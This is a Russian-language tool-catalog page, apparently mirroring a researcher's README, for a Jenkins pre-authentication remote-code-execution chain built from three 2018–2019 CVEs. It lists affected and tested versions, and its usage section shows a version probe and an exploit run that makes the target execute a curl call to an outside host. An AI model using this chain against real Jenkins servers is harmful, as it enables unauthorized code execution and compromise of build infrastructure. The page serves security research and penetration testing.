Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
awesome-jenkins-rce-2019 — С мая 2017 года в Jenkins не было pre-auth RCE, но этот — тот самый! | Kitploit
Инструменты/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

С мая 2017 года в Jenkins не было pre-auth RCE, но этот — тот самый!

Репозиторий
6101277 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

awesome-jenkins-rce-2019

С мая 2017 года в Jenkins не было RCE без аутентификации, но теперь есть!

Он объединяет CVE-2018-1000861, CVE-2019-1003005 и CVE-2019-1003029 для более надёжного и элегантного удалённого выполнения кода без аутентификации!

Затронутые версии

  • ANONYMOUS_READ отключён

    • Версия Jenkins < 2.138
  • ANONYMOUS_READ включён (или при наличии обычной учётной записи)

    • Время сборки Jenkins < 2019-01-28

Использование

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Протестировано на

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 с включённым ANONYMOUS_READ
  • Jenkins 2.152 с включённым ANONYMOUS_READ
  • Jenkins 2.153 с включённым ANONYMOUS_READ
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Благодарности

  • @orange_8361 за CVE-2018-1000861
  • @0ang3el за CVE-2019-1003005
  • @webpentest за CVE-2019-1003029

Часть слайдов из моего доклада на HITB AMS 2019:

1.png 2.png 3.png

Ссылки

  • Взлом Jenkins, часть 1: играем с динамической маршрутизацией
  • Взлом Jenkins, часть 2: злоупотребляем метапрограммированием для RCE без аутентификации
  • Бюллетень безопасности Jenkins 2018-12-05
  • Бюллетень безопасности Jenkins 2019-01-28
  • Бюллетень безопасности Jenkins 2019-03-06
Скачать инструмент